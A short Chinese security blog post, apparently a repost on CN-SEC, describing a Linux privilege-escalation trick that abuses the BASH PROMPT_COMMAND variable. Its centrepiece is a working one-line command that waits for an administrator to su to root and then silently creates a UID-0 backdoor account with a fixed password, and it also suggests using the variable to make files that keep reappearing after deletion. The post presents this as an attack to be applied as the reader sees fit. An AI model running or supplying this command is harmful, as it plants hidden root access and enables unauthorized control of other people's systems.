利用BASH提权的技巧 's

admin 2017年5月7日11:50:36评论735 views字数 328阅读1分5秒阅读模式
摘要

作者:xi4oyu要利用成功的话,还得看管理员的习惯,是否喜欢用su切换成root看个BASH的环境变量

作者:xi4oyu

要利用成功的话,还得看管理员的习惯,是否喜欢用su切换成root

看个BASH的环境变量

$PROMPT_COMMAND

这个变量保存了在主提示符$PS1显示之前需要执行的命令.

export PROMPT_COMMAND=”/usr/sbin/useradd -o -u 0 kkoo &>/dev/null && echo kkoo:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND”

看图:

利用BASH提权的技巧  's

随后你用su变成root,看看是否多了个用户呢

也可以建立用户删除不了的文件
比如,用户想删除某个,你在prompt_command里面加入cp命令,每次他执行完del都会又cp一个过去

具体怎么应用看你自己了

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年5月7日11:50:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   利用BASH提权的技巧 'shttp://cn-sec.com/archives/45002.html

发表评论

匿名网友 填写信息